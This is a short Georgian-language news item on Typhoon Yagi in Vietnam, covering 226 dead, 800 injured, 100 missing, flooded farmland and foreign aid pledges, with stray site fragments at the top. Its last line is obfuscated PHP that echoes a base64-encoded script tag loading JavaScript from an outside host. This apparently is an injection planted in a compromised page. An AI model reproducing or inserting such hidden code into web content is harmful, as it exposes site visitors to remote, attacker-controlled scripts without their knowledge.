celsiusi
ავერსი საქკაბელი

 ვიეტნამში ტაიფუნ „იაგის“ მსხვერპლთა რიცხვი 226-მდე გაიზარდა, დაშავებულია, სულ მცირე, 800 ადამიანი. ინფორმაციას „როიტერი“ ავრცელებს.

ვიეტნამის კატასტროფების მართვის სააგენტოს ინფორმაციით, ტაიფუნ „იაგის“ შედეგად, მეწყერებისა და წყალდიდობების გამო, სულ მცირე, 100 ადამიანი უგზო-უკვლოდ დაკარგულად ითვლება.

სტიქიის გამო ქვეყნის რამდენიმე ნაწილში შეფერხებულია ელექტროენერგიისა მიწოდება.

კატასტროფების მართვის სააგენტოს ცნობით, მეწყერებმა და წყალდიდობებმა ჩრდილოეთ ვიეტნამში 200,000 ჰექტარზე მეტი სახნავ-სათესი მიწები დატბორა. რამდენიმე ქვეყანამ, მათ შორის ავსტრალიამ, იაპონიამ, სამხრეთ კორეამ და აშშ-მა განაცხადეს, რომ ვიეტნამს დახმარებას გაუგზავნიან.​​​​​​​​​​​​​​​​

ვიეტნამამდე ტაიფუნი „იაგი“ სამხრეთ ჩინეთსა და ფილიპინებს დაატყდა თავს, სადაც სტიქიის შედეგად, სულ მცირე, 24 ადამიანია დაღუპული.

81
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");